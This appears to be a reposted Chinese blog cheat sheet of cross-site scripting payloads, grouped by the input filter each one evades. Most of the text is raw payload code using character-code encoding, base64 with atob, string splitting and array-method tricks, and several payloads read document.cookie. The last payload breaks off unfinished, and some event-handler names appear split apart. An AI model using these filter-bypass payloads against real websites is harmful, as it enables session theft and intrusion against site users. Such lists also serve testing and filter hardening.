xss注入

标签：XSS php xss alert Injection document com 注入

 

Reflected XSS

Persistent XSS

DOM-based XSS

Mutation XSS

Universal Cross-site Scripting (UXSS)

通用跨站脚本攻击(UXSS)

<marquee>Mannix</marquee>

">"><script>with(document)alert(cookie)</script><"<"

javascript关键字过滤 +加号过滤

# document.cookie

document['coo'['CONCAT'.toLowerCase()]('kie')]

<script>alert(document['coo'['CONCAT'.toLowerCase()]('kie')])</script>

<script>alert(document['dom'['CONCAT'.toLowerCase()]('ain')])</script>

圆括号过滤

# alert(1)

alert`1`

;分号过滤

<img src=1 one rror=alert(1)>

单、双、反引号过滤

eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41))//

<script>eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41))//</script>

.过滤

with(location)alert(hash)

<script>with(location)alert(hash)</script>

<script>with(document)alert(cookie)</script>

html标签过滤、属性名过滤

<video width="0" height="0" oncanplay=alert`0`>

<source src="http://www.runoob.com/try/demo_source/mov_bbb.mp4" type="video/mp4"></video>

<details ontoggle=alert(1) open>

<marquee onscroll=alert(document.domain)>

img

svg

body

html

embed

script

object

details

isindex

iframe

audio

video

过滤alert

<script>window['alert'](1)</script>

<script>window['ale'+'rt'](1)</script>

<script>window["alert"](1)</script>

<script>window[`alert`](1)</script>

<script>parent['alert'](1)</script>

<script>self['alert'](1)</script>

<script>top['alert'](1)</script>

<script>frames['alert'](1)</script>

<script>self.frames['alert'](1)</script>

<script>self.parent['alert'](1)</script>

<script>self.top['alert'](1)</script>

top['aler'+'t'](1)

[1].find(confirm)

[1].map(confirm)

[1].some(confirm)

[1].every(confirm)

[1].filter(confirm)

[1].findIndex(confirm)

[1].map(alert)

[1].find(alert)

[1].every(alert)

[1].filter(alert)

[1].findIndex(alert)

[1].some(alert)

<script>[document.cookie].map(alert)</script>

<script>[1].map(alert)</script>

alert(document.domain)

YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==

<svg onl oad=eval(atob`YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==`)>

<svg onl oad=eval(atob`YWxlcnQoMSk=`)>

<svg onl oad=setTimeout(atob`YWxlcnQoMSk=`)>

<svg onl oad=setInterval(atob`YWxlcnQoMSk=`)>

<svg onl oad='new Function(atob`YWxlcnQoMSk=`)()'>

<svg onl oad=self[`ev`+`al`](atob`YWxlcnQoMSk=`)>

<script>document.write("<s","crip","t>al","ert(","1)","</s","cript>")</script>

<script>atob.constructor(atob`YWxlcnQoMSk`)``</script>

<script>atob.constructor(atob(/YWxlcnQoMSk/.source))()</script>

<script>window[Symbol.hasInstance]=eval

atob`YWxlcnQoMSk` instanceof window</script>

<script>atob.constructor(unescape([...escape((

标签：XSS,php,xss,alert,Injection,document,com,注入
From： https://www.cnblogs.com/jerry-autumn/p/16858967.html